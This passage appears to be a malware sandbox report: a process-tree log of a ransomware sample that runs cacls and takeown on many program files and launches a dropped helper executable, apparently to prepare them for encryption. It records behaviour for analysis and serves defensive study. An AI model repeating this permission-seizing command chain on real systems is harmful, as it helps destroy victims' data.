C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵
- Loads dropped DLL
PID:2784 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:2988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "watermark.png" -nobanner3⤵
- Loads dropped DLL
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:2616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵
- Loads dropped DLL
PID:2836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:2572 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:3164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3384 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:3428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3084 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3132 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:3516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
PID:3208 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
PID:3296 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:3468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵
- Loads dropped DLL
PID:3556 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:3260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "br.gif" -nobanner3⤵
- Loads dropped DLL
PID:3568 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "br.gif" -nobanner4⤵
- Executes dropped EXE
PID:3804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:3836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵
- Modifies file permissions
PID:3880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "form_responses.gif" -nobanner3⤵PID:3884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "form_responses.gif" -nobanner4⤵
- Executes dropped EXE
PID:3652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:3748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_email.gif" -nobanner3⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_email.gif" -nobanner4⤵PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:4084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:4132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tr.gif" -nobanner3⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tr.gif" -nobanner4⤵PID:3948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:3616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:3620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:3544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:4156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:4164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:3988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:3992
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:4288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:4000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:3964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:4004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:4100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:4172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:4200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:4216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can.fca" -nobanner3⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can.fca" -nobanner4⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:4268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:4052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:4064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa03.ths" -nobanner3⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "usa03.ths" -nobanner4⤵PID:4076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:4352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:4480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:4664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:4376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:4496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:4468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:4544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:4576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:4564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "eula.ini" -nobanner3⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "eula.ini" -nobanner4⤵PID:4700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:4744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:4768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:4808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:4884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:4820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:5000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:4904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:4960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:4968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:5028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:5060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:5092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:4716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:5160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:5204
-
